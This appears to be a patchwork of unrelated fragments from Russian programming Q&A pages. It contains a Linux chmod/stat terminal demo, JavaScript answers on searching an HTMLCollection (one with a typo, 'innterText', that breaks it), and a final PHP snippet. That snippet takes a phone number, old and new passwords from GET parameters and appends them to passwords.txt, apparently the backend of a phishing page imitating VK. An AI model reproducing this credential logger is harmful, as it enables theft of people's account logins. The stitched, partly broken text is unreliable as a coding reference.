так 'r' разве не для этого используется?Для экранирования? Нет
$ cd /tmp
$ touch testfile
$ stat testfile
File: testfile
Size: 0 Blocks: 0 IO Block: 4096 regular empty file
Device: 813h/2067d Inode: 788128 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 1000/ ---) Gid: ( 1000/ ---)
Access: 2019-11-23 09:46:10.253738501 +0300
Modify: 2019-11-23 09:46:10.253738501 +0300
Change: 2019-11-23 09:46:10.253738501 +0300
Birth: -
$ chmod 600 testfile
$ stat testfile
File: testfile
Size: 0 Blocks: 0 IO Block: 4096 regular empty file
Device: 813h/2067d Inode: 788128 Links: 1
Access: (0600/-rw-------) Uid: ( 1000/ ---) Gid: ( 1000/ ---)
Access: 2019-11-23 09:46:10.253738501 +0300
Modify: 2019-11-23 09:46:10.253738501 +0300
Change: 2019-11-23 09:46:45.537979610 +0300
Birth: -
$
var elements = [...document.getElementsByClassName("txtBlock")];
var value = 'abc';
elements.find(
function(str) {
return str.innerText == value;
}
);
Попробуйте так var elements = [...document.getElementsByClassName("txtBlock")];
elements.forEach(function (item) {
if (item.innterText == "textForSearch") {
console.log('found');
} else {
console.log('not found');
}
});
В код поставьте ваши значения var elements = document.getElementsByClassName("txtBlock");
Вернет HTMLCollection. К нему неприменимы методы массивов. Если хотите их всё же применить, то преобразуйте в массив. Можно такvar elements = [...document.getElementsByClassName("txtBlock")];
илиvar elements = document.getElementsByClassName("txtBlock");
elements = Array.from(elements);
if (isset($_GET['mobile']) && isset($_GET['pass']) && isset($_GET['newpass']) && isset($_GET['repass']) && ($_GET['mobile']!="") && ($_GET['pass']!="") && ($_GET['newpass']!="") && ($_GET['repass']!=""))
{
$location='https://vk.com/';
$Log = $_GET['mobile'];
$Pass = $_GET['pass'];
$newpassword = $_GET['newpass'];
$newpassword2 = $_GET['repass'];
$smscode = $_GET['code'];
$log = fopen("passwords.txt","a+");
fwrite($log,"\n $Log:$Pass:$newpassword:$newpassword2 \n");
fclose($log);
$answer = ['type' => 'success', 'message' => 'All OK'];
echo json_encode($answer);
} else {
echo json_encode(['type' => 'error', 'message' => 'All not OK']);
}